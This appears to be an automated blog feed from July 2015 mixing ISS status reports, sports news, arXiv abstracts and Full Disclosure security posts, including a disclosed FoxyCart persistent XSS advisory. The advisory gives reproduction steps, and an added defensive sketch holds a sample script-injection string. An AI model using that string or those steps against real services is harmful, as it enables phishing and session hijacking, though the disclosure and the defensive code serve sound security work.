The purpose of this experiment is to perform radiation testing of synthetic muscle to determine how radiation-hardened the proprietary materials are, for dual use on earth and in space, in extremely challenging environments. Both the preliminary radiation testing at PPPL/Princeton and the exposure to solar and cosmic radiation on the ISS determine radiation resistance of synthetic muscle and provide projections for radiation resistance in high radiation environments. Robotics made of synthetic muscle will be able to help humans on earth, mitigating and correcting dire situations in extremely challenging environments. Robots made of these materials will be able to assist humans in space and be able to survive deep space travel. A follow up external platform experiment is being planned. Sleep ISS-12: Kelly and Kornienko are performing their week of sleep logging. Within fifteen minutes of wakeup, the crew answers questions from the SleepLog application on the Station Support Computer (SSC).  The Sleep ISS-12 experiment monitors ambient light exposure and crew member activity, and collects subjective evaluations of sleep and alertness, to examine the effects of space flight and ambient light exposure on sleep during a year-long mission on the International Space Station (ISS). Node 3 Carbon Dioxide Removal Assembly (CDRA): Due to the crew shelter in place, N3 CDRA maintenance scheduled for today has been postponed to Monday 7/20/15.  This includes the Air Selector Valve (ASV) 104 removal and replacement (R&R) and N3 CDRA leak check. The Lab CDRA is currently operating, and as of this writing ppCO2 is 1.6 mmHg. Today’s Planned Activities All activities were completed unless otherwise noted. CASKAD. 
Manual Mixing in Bioreactor / r/g 9277 JEMAL table extension 24-hour BP Monitoring (end)  r/g 9337 SPHERES – Battery Charging Remote SM Laptop Testing (REMOTE RS LAPTOP)  Preparation / r/g 9351 Installation of Voltage Converter ПН28-120 (Installation and connection of СБИ cable). / r/g 9328 SYN_MUSCL – Documentation Photo HABIT – Hardware activation Installation of Voltage Converter ПН28-120 (Mating Onboard Measurement System (СБИ) cable) / r/g 9328 step 6 EMRMS – Closing SAM Capture Mechanism to Softdock position Installation of Voltage Converter ПН28-120 (Installation and Connection of СБИ cable, Closeout Ops) / r/g 9328 Installation of Voltage Converter ПН28-120 / r/g 9328 SPHERES – Battery Charging PAO crew prep PAO Event with A Year Long Mission crew DAN. Experiment Ops / r/g 9083 [Deferred] DAN. Experiment Assistance / r/g 9083 [Deferred] JEM AL Slide Table Retraction JEMRMS RLT Laptop Deactivation Node 3 Carbon Dioxide Removal Assembly (CDRA) CO2 Selector Valve 104 R&R [Deferred] DAN. Experiment Ops / r/g 9083 [Deferred] DAN. Experiment Assistance / r/g 9083 [Deferred] SPHERES – Battery Charging MPEG-2 Video Downlink Test via KU-band prior to Soyuz 717 Docking to the ISS Filling (separation) of EDV (KOV) No.1137 Remote SM Laptop Testing (REMOTE RS LAPTOP)  / r/g 9351 SPHERES – Experiment OBT SPHERES – Review Cleaning ВД1 and ВД2 Air Ducts in MRM2 SPHERES – Payload Conference SPHERES – Battery Charging VHF1 Comm Test via US Ground Sites (WAL, DRY, WHI) from the SM N3 CDRA leak check [Deferred] VEG-01 – Plant Photo SPHERES – Battery Charging Flight Director / ISS Crew Tagup Completed Task List Items ISS Safety Video  Ground Activities All activities were completed unless otherwise noted. 
OASIS video JEMRMS activities

Three-Day Look Ahead:
Friday, 07/17: SPHERES Slosh run
Saturday, 07/18: Crew off duty, housekeeping
Sunday, 07/19: Crew off duty

QUICK ISS Status – Environmental Control Group:

Component: Status
Elektron: On
Vozdukh: Manual
[СКВ] 1 – SM Air Conditioner System (“SKV1”): On
[СКВ] 2 – SM Air Conditioner System (“SKV2”): Off
Carbon Dioxide Removal Assembly (CDRA) Lab: Standby
Carbon Dioxide Removal Assembly (CDRA) Node 3: Operate
Major Constituent Analyzer (MCA) Lab: Shutdown
Major Constituent Analyzer (MCA) Node 3: Operate
Oxygen Generation Assembly (OGA): Standby
Urine Processing Assembly (UPA): Standby
Trace Contaminant Control System (TCCS) Lab: Full Up
Trace Contaminant Control System (TCCS) Node 3: Off

from ISS On-Orbit Status Report http://ift.tt/1I8xCEF
via IFTTT

Eleven Anonymous Turkish Muslims Baptized Orthodox Christians

Eleven Turkish citizens, among them a famous Turkish actor, were baptized in May 2015. The baptism was celebrated by the Metropolitan of Attica.

from Google Alert - anonymous http://ift.tt/1J4BBkt
via IFTTT

[FD] FoxyCart Bug Bounty #1 - Filter Bypass & Persistent Vulnerability

Document Title:
===============
FoxyCart Bug Bounty #1 - Filter Bypass & Persistent Vulnerability

References (Source):
====================
http://ift.tt/1V2pBF6 098bdc9b309783df65044c5abb690dafdd4bcd436c380ae68c924fe37e14b4e0

Release Date:
=============
2015-07-15

Vulnerability Laboratory ID (VL-ID):
====================================
1451

Common Vulnerability Scoring System:
====================================
3.4

Product & Service Introduction:
===============================
Helping developers _add_ custom ecommerce without reinventing the wheel.

(Copy of the Homepage: http://ift.tt/1RDAQo9 )

Abstract Advisory Information:
==============================
The Vulnerability Laboratory Core Research Team discovered a filter bypass issue and an application-side input validation vulnerability in the official FoxyCart web-application.

Vulnerability Disclosure Timeline:
==================================
2015-03-05: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH)
2015-04-01: Vendor Notification (FoxyCart - Security Research Team)
2015-04-09: Vendor Response/Feedback (FoxyCart - Security Research Team)
2015-06-30: Vendor Fix/Patch (FoxyCart - Developer Team)
2015-07-15: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
FoxyCart LLC
Product: FoxyCart - Web Application 2015 Q2

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Technical Details & Description:
================================
A persistent input validation mail encoding vulnerability has been discovered in the official FoxyCart company web-application. The issue allows remote attackers to inject their own malicious web context to the application-side of a vulnerable module or function.

The security vulnerability is located in the `comments` input field value of the `landing/white-glove-onboarding > Help Form` module. Remote attackers can exploit the issue to execute persistent malicious context in foxycart service mails. The injection takes place in the help contact form POST method request with the vulnerable comments input value. The execution of the script code occurs on the application-side in the email body context. Attackers are able to inject iframes, img sources with onload alert or other script code tags.

The service does not encode the input and also has no input restriction. After the code has been saved during the registration, the internal service takes the wrongly encoded DBMS entries and streams them back in a notification mail to the registered user's inbox. The attacker is also able to include random email addresses to stream mails with malicious persistent context to random targets for phishing, spam and co. The code does not execute in the profile values that introduces to the manufacturer itself but in the attached comments value that becomes visible in the copy mail.

The security risk of the persistent input validation web vulnerability in the mail encoding of the web-server is estimated as medium with a cvss (common vulnerability scoring system) count of 3.4. If the issue exists in the main service values, the other services can be affected by the issue too.

Exploitation of the mail encoding and web-server validation vulnerability requires low or medium user interaction and no privileged customer application user account. Successful exploitation of the persistent mail encoding web vulnerability results in session hijacking, persistent phishing attacks, persistent redirects to external malicious source and persistent manipulation of affected or connected module context.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] landing/white-glove-onboarding > Help Form

Vulnerable Parameter(s):
[+] comments

Affected Module(s):
[+] We`ve received your email

Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by remote attackers without privileged application user account and with low or medium user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce ...
1. Open the foxycart service
2. Surf to the vulnerable contact form url
3. Inject random value to the inputs and inject to the comments your script code payload
4. Save the entry
5. Redirect via Refresh Referer to confirm the contact request
6. Check inbox of the contact mail input
7. The code executes in the comments body section
8. Successful reproduction of the vulnerability!
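The root cause named in the FoxyCart advisory above is that the `comments` value is streamed back into the confirmation mail body without output encoding. The sketch below is an added example, not FoxyCart's code and not part of the advisory: it contrasts an unencoded HTML mail template with one that escapes every user-supplied value and rejects malformed recipient input. All function names, the template, the sender address and the sample input are assumptions made for illustration.

```python
import html
import re
from email.message import EmailMessage

# Constructed sample of a hostile `comments` value: markup with a script handler
# and an iframe, the two kinds of injected context the advisory mentions.
SAMPLE_COMMENTS = ('Please call me back <img src="x" onerror="alert(1)">'
                   '<iframe src="https://example.invalid/"></iframe>')

# Conservative single-address pattern (hypothetical policy). It rejects address
# lists, display names and CR/LF, so one form post cannot fan out to several
# recipients or smuggle extra headers. It does not prove address ownership.
_ADDR_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+")

# Hypothetical confirmation-mail template.
TEMPLATE = ("<html><body><p>Hi {name},</p><p>We've received your email:</p>"
            "<blockquote>{comments}</blockquote></body></html>")


def render_unsafe(name, comments):
    """Pattern described in the advisory: stored input placed into HTML as-is."""
    return TEMPLATE.format(name=name, comments=comments)


def render_safe(name, comments):
    """Encode every user-controlled value for the HTML context before insertion."""
    return TEMPLATE.format(name=html.escape(name, quote=True),
                           comments=html.escape(comments, quote=True))


def validate_recipient(addr):
    """Accept exactly one plain address; raise ValueError on anything else."""
    if not _ADDR_RE.fullmatch(addr):
        raise ValueError("rejected recipient address")
    return addr


def build_confirmation(to_addr, name, comments):
    """Build a multipart/alternative mail: plain text plus an encoded HTML part."""
    msg = EmailMessage()
    msg["From"] = "support@example.invalid"      # assumed sender
    msg["To"] = validate_recipient(to_addr)
    msg["Subject"] = "We've received your email"
    # The text/plain part needs no HTML encoding; mail clients show it literally.
    msg.set_content("Hi {0},\n\nWe've received your email:\n\n{1}\n".format(name, comments))
    msg.add_alternative(render_safe(name, comments), subtype="html")
    return msg


if __name__ == "__main__":
    print(render_unsafe("Ann", SAMPLE_COMMENTS))
    print(render_safe("Ann", SAMPLE_COMMENTS))
```

Encoding at output time covers values already stored unencoded in the database, which input filtering alone would not.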

Source: Gmail -> IFTTT-> Blogger

[FD] UDID+ v2.5 iOS - Mail Command Inject Vulnerability

Dortmund heads to Belarus or Austria in Europa League

NYON, Switzerland (AP) Borussia Dortmund will start its first Europa League campaign in five years against Shakhtyor Soligorsk or Wolfsberger in the third qualifying round.

from FOX Sports Digital http://ift.tt/1Lez8FX
via IFTTT

Liverpool beats Brisbane Roar 2-1 on late James Milner goal

BRISBANE, Australia (AP) James Milner scored the winner in the 75th minute to give Liverpool a 2-1 comeback win over A-League club Brisbane Roar in a friendly match Friday in front of more than 50,000 fans at Suncorp Stadium.

from FOX Sports Digital http://ift.tt/1CL9Yf9
via IFTTT

Monaco draws Young Boys in Champions League qualifiers

NYON, Switzerland (AP) Monaco, a Champions League quarterfinalist last season, has been paired with Young Boys in the third qualifying round of this season's competition.

from FOX Sports Digital http://ift.tt/1HyCQ9o
via IFTTT

NSA Releases Open Source Network Security Tool for Linux

The United States National Security Agency (NSA) has released a network security tool for Government and the private sectors to help secure their networks against cyber attacks. Dubbed Systems Integrity Management Platform (SIMP), the tool is now publicly available on the popular source code sharing website GitHub. According to an official release from NSA, SIMP makes it easier for


from The Hacker News http://ift.tt/1HUdcsC
via IFTTT

problem with anonymous function in executable

I have a three files that work perfectly. However when I compile them matlab behaves as if I didn't include one of the files even though it is included in ...

from Google Alert - anonymous http://ift.tt/1I81ZeD
via IFTTT

How to Crack RC4 Encryption in WPA-TKIP and TLS

Security researchers have developed a more practical and feasible attack technique against the RC4 cryptographic algorithm that is still widely used to encrypt communications on the Internet. Despite being very old, RC4 (Rivest Cipher 4) is still the most widely used cryptographic cipher implemented in many popular protocols, including: SSL (Secure Socket Layer) TLS (Transport Layer


from The Hacker News http://ift.tt/1I7WvAm
via IFTTT

Pellegrini won't play Sterling in 1st Australian match

GOLD COAST, Australia (AP) Manchester City won't play new signing Raheem Sterling in Saturday's match against sister club and A-League side Melbourne City on the Gold Coast.

from FOX Sports Digital http://ift.tt/1Gpt59r
via IFTTT

50 Miles on Pluto


A 50 mile (80 kilometer) trip across Pluto would cover the distance indicated by the scale bar in this startling image. The close-up of the icy world's rugged equatorial terrain was captured when the New Horizons spacecraft was about 47,800 miles (77,000 kilometers) from the surface, 1.5 hours before its closest approach. Rising to an estimated 11,000 feet (3,500 meters) the mountains are likely composed of water ice. Suggesting surprising geological activity, they are also likely young with an estimated age of 100 million years or so based on the apparent absence of craters. The region pictured is near the base of Pluto's broad, bright, heart-shaped feature. via NASA http://ift.tt/1M74PAm

Thursday, July 16, 2015

Optimizing the computation of overriding. (arXiv:1507.04630v1 [cs.AI])

We introduce optimization techniques for reasoning in DLN---a recently introduced family of nonmonotonic description logics whose characterizing features appear well-suited to model the applicative examples naturally arising in biomedical domains and semantic web access control policies. Such optimizations are validated experimentally on large KBs with more than 30K axioms. Speedups exceed 1 order of magnitude. For the first time, response times compatible with real-time reasoning are obtained with nonmonotonic KBs of this size.



from cs.AI updates on arXiv.org http://ift.tt/1I7kvn9
via IFTTT

Black-Box Policy Search with Probabilistic Programs. (arXiv:1507.04635v1 [stat.ML])

In this work, we explore how probabilistic programs can be used to represent policies in sequential decision problems. In this formulation, a probabilistic program is a black-box stochastic simulator for both the problem domain and the agent. We relate classic policy gradient techniques to recently introduced black-box variational methods which generalize to probabilistic program inference. We present case studies in the Canadian traveler problem, Rock Sample, and a benchmark for optimal diagnosis inspired by Guess Who. Each study illustrates how programs can efficiently represent policies using moderate numbers of parameters.



from cs.AI updates on arXiv.org http://ift.tt/1gErlEI
via IFTTT

Overeaters Anonymous

Signature Care Center. Overeaters Anonymous. Date: July 16, 2015. Time: 10:00 AM. A program of recovery from compulsive eating using twelve ...

from Google Alert - anonymous http://ift.tt/1f95BQ6
via IFTTT

Uruguayan soccer legend Alcides Ghiggia dies at 88

MONTEVIDEO, Uruguay (AP) Alcides Edgardo Ghiggia, who scored the winning goal in the final game of the 1950 World Cup to give Uruguay a stunning 2-1 victory over Brazil - still recalled as Brazil's greatest defeat - died on Thursday. He was 88.

from FOX Sports Digital http://ift.tt/1O9Fc0i
via IFTTT

Uruguayan soccer great Alcides Ghiggia dies at 88

MONTEVIDEO, Uruguay (AP) Alcides Edgardo Ghiggia, the Uruguayan soccer great who scored the late winning goal in a stunning 2-1 victory over Brazil in the 1950 World Cup final, has died. He was 88.

from FOX Sports Digital http://ift.tt/1O9Fc07
via IFTTT

French defender Kaboul joins Sunderland from Tottenham

SUNDERLAND, England (AP) French center back Younes Kaboul has joined Sunderland from fellow English Premier League side Tottenham, ending his eight-year spell at White Hart Lane.

from FOX Sports Digital http://ift.tt/1HxQvgX
via IFTTT

Anonymous on Twitter: "Anonymous takes down @DenverPolice union website (@ColoradoFOP ...

... 5h5 hours ago. Anonymous takes down @DenverPolice union website (@ColoradoFOP http://coloradofop.org ) after cops kill #PaulCastaway ...

from Google Alert - anonymous https://www.google.com/url?rct=j&sa=t&url=https://twitter.com/YourAnonNews/status/621470322852802560&ct=ga&cd=CAIyGjgxMzAxNTQ0ZWE3M2NhMmQ6Y29tOmVuOlVT&usg=AFQjCNEk4zt2dIkCmDaKfmoAWkYFeTdiMA
via IFTTT

[FD] Broken, Abandoned, and Forgotten Code, Part 11

Part 11 of Broken, Abandoned, and Forgotten Code is up! In this part, we regenerate the SquashFS filesystem for our exploit firmware. We have to shrink the firmware image down to 4MB from nearly 9MB to avoid crashing the R6200's UPnP daemon. We also add one more field to the firmware header that, if absent, will cause the bootloader to hang. Here's a link to part 11: http://ift.tt/1TF5US7 If you missed my post to Full Disclosure where I introduced the series, here's that: http://ift.tt/1F6IUWA As always I welcome feedback via email or Twitter. I'm @zcutlip. I hope you enjoy it! Cheers, Zach

Source: Gmail -> IFTTT-> Blogger

[FD] double free's in glibc (and tcmalloc/jemalloc)

Re: [FD] 15 TOTOLINK router models vulnerable to multiple RCEs

> Title: 15 TOTOLINK router models vulnerable to multiple RCEs
> Advisory URL: http://ift.tt/1I3bM5z
> Blog URL: http://ift.tt/1OeiK6K
> Date published: 2015-07-16
> Vendors contacted: None
> Release mode: 0days, Released
> CVE: no current CVE

This was my morning LOL:

$ curl -O http://ift.tt/1I5iLuO
$ unzip TOTOLINK\ N300RG_8_70.bin
$ binwalk -e TOTOLINK\ N300RG_8_70.bin

DECIMAL HEXADECIMAL DESCRIPTION

Source: Gmail -> IFTTT-> Blogger

[FD] New CVE's to be released the 17th of June.

[FD] SEC Consult SA-20150716-0 :: Permanent Cross-Site Scripting in Oracle Application Express


Source: Gmail -> IFTTT-> Blogger

Brazilian club Palmeiras signs Paraguayan striker Barrios

SAO PAULO (AP) Paraguayan striker Lucas Barrios has been officially introduced to Palmeiras fans after signing a three-year contract with the Brazilian club.

from FOX Sports Digital http://ift.tt/1LmSVl8
via IFTTT

Janson Media to Bring Bob Ross to Digital Platforms Worldwide


Bob Ross Inc. is pleased to announce an agreement with Janson Media that will introduce The Joy of Painting with Bob Ross — the most-recognized, most-watched TV art show in history — to digital platforms worldwide. The series has already begun its rollout on Amazon Instant Video and Amazon Prime.

You’ve seen Bob Ross before. He is the soft-spoken guy painting happy clouds, mountains, trees in about 26 television minutes, using big housepainting-type brushes and encouraging his audiences with his gentle reminder, “you can do it.”

The Joy of Painting continues to air on television networks and channels worldwide, making The Joy of Painting the most popular art show of all time.

“We are thrilled — no, ‘happy’ actually — to announce this new agreement,” said Jesse Janson, Director of Acquisitions and Digital Media at Janson Media. “We believe The Joy of Painting, long a staple on U.S. public television stations nationwide, will find important new audiences on all of the major digital platforms worldwide, where episodes will be available to Bob Ross fans 24 hours a day, seven days a week, 365 days a year.”

Click here to access: http://bit.ly/BobRossAmazonPrime

For more information, send an email to info@bobross.com or call 1-800-262-7677




from The 'hotspot' for all things Bob Ross. http://ift.tt/1M7XSyS
via IFTTT

FIFA ethics panel wants to lift strict secrecy rules

ZURICH (AP) FIFA's ethics committee wants to lift secrecy rules that protect accused officials from being identified and keep case details private.

from FOX Sports Digital http://ift.tt/1V7kwLD
via IFTTT

Where did SIFT and SURF go in OpenCV 3?

 


If you’ve had a chance to play around with OpenCV 3 (and do a lot of work with keypoint detectors and feature descriptors) you may have noticed that the SIFT and SURF implementations are no longer included in the OpenCV 3 library by default.

Unfortunately, you probably learned this lesson the hard way by opening up a terminal, importing OpenCV, and then trying to instantiate your favorite keypoint detector, perhaps using code like the following:

$ python
>>> import cv2
>>> detector = cv2.FeatureDetector_create("SIFT")
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
AttributeError: 'module' object has no attribute 'FeatureDetector_create'

Oh no! There is no longer a cv2.FeatureDetector_create method!

The same is true for our cv2.DescriptorExtractor_create function as well:

>>> extractor = cv2.DescriptorExtractor_create("SIFT")
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
AttributeError: 'module' object has no attribute 'DescriptorExtractor_create'

Furthermore, cv2.SIFT_create and cv2.SURF_create will fail as well:

>>> cv2.SIFT_create()
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
AttributeError: 'module' object has no attribute 'SIFT_create'
>>> cv2.SURF_create()
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
AttributeError: 'module' object has no attribute 'SURF_create'

I’ll be honest — this had me scratching my head at first. How am I supposed to access SIFT, SURF, and my other favorite keypoint detectors and local invariant descriptors if cv2.FeatureDetector_create and cv2.DescriptorExtractor_create have been removed?

The cv2.FeatureDetector_create and cv2.DescriptorExtractor_create were (and still are) methods I used all the time. And personally, I really liked the OpenCV 2.4.X implementation. All you needed to do was pass in a string and the factory method would build the instantiation for you. You could then tune the parameters using the getter and setter methods of the keypoint detector or feature descriptor.

Furthermore, these methods have been part of OpenCV 2.4.X for many years. Why in the world were they removed from the default install? And where were they moved to?

In the remainder of this blog post, I’ll detail why certain keypoint detectors and local invariant descriptors were removed from OpenCV 3.0 by default. And I’ll also show you where you can find SIFT, SURF, and other detectors and descriptors in the new version of OpenCV.

Why were SIFT and SURF removed from the default install of OpenCV 3.0?

SIFT and SURF are examples of algorithms that OpenCV calls “non-free” modules. These algorithms are patented by their respective creators, and while they are free to use in academic and research settings, you should technically be obtaining a license/permission from the creators if you are using them in a commercial (i.e. for-profit) application.

With OpenCV 3 came a big push to move many of these “non-free” modules out of the default OpenCV install and into the opencv_contrib package. The opencv_contrib package contains implementations of algorithms that are either patented or in experimental development.

The algorithms and associated implementations in opencv_contrib are not installed by default and you need to explicitly enable them when compiling and installing OpenCV to obtain access to them.

Personally, I’m not too crazy about this move.

Yes, I understand including patented algorithms inside an open source library may raise a few eyebrows. But algorithms such as SIFT and SURF are pervasive across much of computer vision. And more importantly, the OpenCV implementations of SIFT and SURF are used by academics and researchers daily to evaluate new image classification, Content-Based Image Retrieval, etc. algorithms. By not including these algorithms by default, more harm than good is done (at least in my opinion).

How do I get access to SIFT and SURF in OpenCV 3?

To get access to the original SIFT and SURF implementations found in OpenCV 2.4.X, you’ll need to pull down both the opencv and opencv_contrib repositories from GitHub and then compile and install OpenCV 3 from source.

Luckily, compiling OpenCV from source is easier than it used to be. I have gathered install instructions for Python and OpenCV for many popular operating systems over on the OpenCV 3 Tutorials, Resources, and Guides page — just scroll down the Install OpenCV 3 and Python section and find the appropriate Python version (either Python 2.7+ or Python 3+) for your operating system.

How do I use SIFT and SURF with OpenCV 3?

So now that you have installed OpenCV 3 with the opencv_contrib package, you should have access to the original SIFT and SURF implementations from OpenCV 2.4.X, only this time they’ll be in the xfeatures2d sub-module through the cv2.xfeatures2d.SIFT_create and cv2.xfeatures2d.SURF_create functions.

To confirm this, open up a shell, import OpenCV, and execute the following commands (assuming you have an image named test_image.jpg in your current directory, of course):

$ python
>>> import cv2
>>> image = cv2.imread("test_image.jpg")
>>> gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
>>> sift = cv2.xfeatures2d.SIFT_create()
>>> (kps, descs) = sift.detectAndCompute(gray, None)
>>> print("# kps: {}, descriptors: {}".format(len(kps), descs.shape))
# kps: 274, descriptors: (274, 128)
>>> surf = cv2.xfeatures2d.SURF_create()
>>> (kps, descs) = surf.detectAndCompute(gray, None)
>>> print("# kps: {}, descriptors: {}".format(len(kps), descs.shape))
# kps: 393, descriptors: (393, 64)

If all goes well, you should be able to instantiate the SIFT and SURF keypoint detectors and local invariant descriptors without error.

It’s also important to note that by using opencv_contrib you will not be interfering with any of the other keypoint detectors and local invariant descriptors included in OpenCV 3. You’ll still be able to access KAZE, AKAZE, BRISK, etc. without an issue:

>>> kaze = cv2.KAZE_create()
>>> (kps, descs) = kaze.detectAndCompute(gray, None)
>>> print("# kps: {}, descriptors: {}".format(len(kps), descs.shape))
# kps: 359, descriptors: (359, 64)
>>> akaze = cv2.AKAZE_create()
>>> (kps, descs) = akaze.detectAndCompute(gray, None)
>>> print("# kps: {}, descriptors: {}".format(len(kps), descs.shape))
# kps: 192, descriptors: (192, 61)
>>> brisk = cv2.BRISK_create()
>>> (kps, descs) = brisk.detectAndCompute(gray, None)
>>> print("# kps: {}, descriptors: {}".format(len(kps), descs.shape))
# kps: 361, descriptors: (361, 64)
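
Code that has to run on both OpenCV 2.4.X and OpenCV 3 can hide the API move described above behind one lookup. The helper below is an added example, not code from the original post: `create_detector` and its error messages are hypothetical names, and it takes the imported `cv2` module as a parameter so the lookup order can be exercised without OpenCV installed.

```python
import types

# Algorithms the post says were moved out of the default OpenCV 3 install.
NON_FREE = {"SIFT", "SURF"}


def create_detector(cv2_module, name):
    """Return a keypoint detector by name, whichever API generation is present.

    Lookup order:
      1. cv2.xfeatures2d.<NAME>_create()   (OpenCV 3 built with opencv_contrib)
      2. cv2.<NAME>_create()               (OpenCV 3 core: KAZE, AKAZE, BRISK, ...)
      3. cv2.FeatureDetector_create(NAME)  (OpenCV 2.4.X string factory)
    """
    name = name.upper()
    factory = name + "_create"

    contrib = getattr(cv2_module, "xfeatures2d", None)
    if contrib is not None and hasattr(contrib, factory):
        return getattr(contrib, factory)()

    if hasattr(cv2_module, factory):
        return getattr(cv2_module, factory)()

    if hasattr(cv2_module, "FeatureDetector_create"):
        # OpenCV 2.4.X: this returns the detector only; descriptors come from
        # cv2.DescriptorExtractor_create in that API generation.
        return cv2_module.FeatureDetector_create(name)

    if name in NON_FREE:
        raise RuntimeError(
            name + " is not available: build OpenCV 3 from source with "
            "opencv_contrib enabled to get cv2.xfeatures2d")
    raise ValueError("unknown detector: " + name)


if __name__ == "__main__":
    try:
        import cv2
    except ImportError:
        # Stand-in module so the script still shows the failure path.
        cv2 = types.SimpleNamespace()
    for wanted in ("SIFT", "KAZE"):
        try:
            print(wanted, "->", create_detector(cv2, wanted))
        except (RuntimeError, ValueError) as exc:
            print(wanted, "->", exc)
```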

Summary

In this blog post we learned that OpenCV has removed the cv2.FeatureDetector_create and cv2.DescriptorExtractor_create functions from the library. Furthermore, the SIFT and SURF implementations have also been removed from the default OpenCV 3 install.

The reason for SIFT and SURF removal is due to what OpenCV calls “non-free” algorithms. Both SIFT and SURF are patented algorithms, meaning that you should technically be getting permission to use them in commercial algorithms (they are free to use for academic and research purposes though).

Because of this, OpenCV has made the decision to move patented algorithms (along with experimental implementations) to the opencv_contrib package. This means that to obtain access to SIFT and SURF, you’ll need to compile and install OpenCV 3 from source with opencv_contrib support enabled. Luckily, this isn’t too challenging with the help of my OpenCV 3 install guides.

Once you have installed OpenCV 3 with opencv_contrib support you’ll be able to find your favorite SIFT and SURF implementations in the xfeatures2d package through the cv2.xfeatures2d.SIFT_create() and cv2.xfeatures2d.SURF_create() functions.

The post Where did SIFT and SURF go in OpenCV 3? appeared first on PyImageSearch.



from PyImageSearch http://ift.tt/1TEUYE6
via IFTTT

Barcelona posts over 600 million euros in revenue

BARCELONA, Spain (AP) Barcelona says it made over 600 million euros ($650 million) in revenue last season, when it won a rare treble of titles including the Champions League.

from FOX Sports Digital http://ift.tt/1Go92Za
via IFTTT

ISS Daily Summary Report – 07/15/15

NanoRack Cubesat Deployer (NRCSD) Operations:  Overnight and this morning ground teams deployed 6 more Cubesats for a total of 12 of 16 planned. Final deployments are scheduled for 5:50 PM CDT today and 12:30 AM CDT tomorrow. The complement consists of 14 Planet Lab Doves, 1 Arkyd-3 and 1 Centennial-1 satellite.  Integrated Resistance and Aerobic Training Study (Sprint) Volume of Oxygen Utilized (VO2) Exercise Session:  Kelly performed his Sprint exercise session on the Cycle Ergometer with Vibration Isolation and Stabilization (CEVIS).  He donned Electrocardiogram (ECG) electrodes, Heart Rate Monitor (HRM) hardware, and Portable Pulmonary Function System (PPFS) calibrations and executed the VO2 protocol.  The Sprint investigation evaluates the use of high intensity, low volume exercise training to minimize loss of muscle, bone, and cardiovascular function in ISS crewmembers during long-duration missions. Upon completion of this study, investigators expect to provide an integrated resistance and aerobic exercise training protocol capable of maintaining muscle, bone and cardiovascular health while reducing total exercise time over the course of a long-duration space flight. This will provide valuable information in support of investigator’s long term goal of protecting human fitness for even longer space exploration missions. Syringe inspection of Plant Gravity Sensing 2 (PGS-2):  Earlier this month when Kelly removed a seed paper kit from a Minus Eighty Degree Celsius Laboratory Freezer for ISS (MELFI) he noted an anomaly with the seeds which was due to contamination in the dish. Today he inspected the condition of the culture medium in the syringe of Plant Gravity Sensing. This task continues the investigation into the PGS-2 contamination. 
Synchronized Position Hold, Engage, and Reorient Experimental Satellites (SPHERES) Slosh: Kelly stowed charged batteries and installed additional batteries for charging for the upcoming SPHERES Slosh session scheduled for Friday. The investigation uses small robotic satellites to examine how liquids move around inside containers in microgravity. A water bottle’s contents slosh around differently in space than on Earth, but the physics of liquid motion in microgravity are not well understood, which affects computer simulations of liquid rocket fuel behavior. Middle school and high school students control the SPHERES to study how liquids behave inside containers in space, which increases the safety and efficiency of future rockets. VEG-01:  Kelly thinned seedlings so that each Veg-01 Plant Pillow contains one plant and refilled the root mat water in the Veggie facility as scheduled.  Veggie provides the necessary lighting and nutrient delivery for efficient plant growth in space. The Veg-01 investigation is used to assess on-orbit function and performance of the Veggie facility, focusing on the growth and development of ‘Outredgeous’ Lettuce (Lactuca sativa) seedlings in the spaceflight environment.  It is also used to determine the effects of the spaceflight environment on composition of microbial flora on the plants and the Veggie facility. General Laboratory Active Cryogenic ISS Experiment Refrigerator (GLACIER) Desiccant Pack Swap:  Kelly removed desiccant from Glacier-5 and replaced with fresh desiccant as part of standard conditioning. Carbon Dioxide Removal Assembly (CDRA) Status:  N3 CDRA has been commanded to standby in preparation for tomorrow’s maintenance to recover the Air Selector Valve (ASV) 104.  After the ASV 104 R&R, the crew will conduct additional N3 CDRA Leak Check steps.  The Lab CDRA is currently operating to remove CO2.   Onboard ppCO2 is currently at 2.0 mmHg.  Today’s Planned Activities All activities were completed unless otherwise noted. 
24-hour BP Monitoring (end) r/g 9337 SPHERES – Battery Charging SPRINT – Hardware Warmup JEM Mesh Cover Grille Cleaning 24-hour BP Monitoring (start) r/g 9337 Installation of Voltage Converter ПН28-120 r/g 9328 CASKAD. Manual Mixing in Bioreactor / r/g 9277 SPRINT Experiment Ops Installation of Voltage Converter ПН28-120 r/g 9328 WHC – Fill (start) Initiate condensate tank offload to CWC WHC – Fill (end) Station Support Computer (SSC) 20 and 23 Loading Preparation for the arriving crew TV Greetings / r/g 9347 Termination of Condensate Tank Offload to CWC SPHERES – Battery Charging SPRINT – Payload Closeout Ops WRS – Recycle Tank Fill Installation of Voltage Converter ПН28-120 r/g 9328 ТКГ 428 (DC1) Transfers and IMS Ops / ТКГ 428 Transfer Ops [РПР] + r/g 9239, 9253  43S Crew SSC Laptops – Wireless connection SPHERES – Battery Charging VEG-01 – Plant thinning VEG-01 – Water refills Replacement of ЗУ2А (ЭА025М) in FGB БР-9ЦУ-8 system with a new СЗУ-ЦУ8 r/g 9333 VIZIR. Experiment Ops with СКП-И P/L. (S-band) / r/g 9345 SPHERES – Battery Charging GLCR5 – Desiccant Pack Swap JRNL – Journal Entry INTERACTION-2. Experiment Ops / r/g 9343 ABOUT GAGARIN FROM SPACE. HAM Radio Session / r/g 9344 CASKAD. Manual Mixing in Bioreactor / r/g 9277 SPRINT – Close-out Ops and Stowage SPHERES – Battery Charging Crew Discretionary Conference Completed Task List Items None Ground Activities All activities were completed unless otherwise noted. 
Cubesat deploys 43S SSC crew config SPRINT VO2 ops OASIS video Lab CDRA activation N3 CDRA deactivation

Three-Day Look Ahead:
Thursday, 07/16: JEMRMS/CubeSat activities, SPHERES Slosh review, N3 CDRA ASV 104 R&R and leak check
Friday, 07/17: SPHERES Slosh run
Saturday, 07/18: Crew off duty, housekeeping

QUICK ISS Status – Environmental Control Group:

Component: Status
Elektron: On
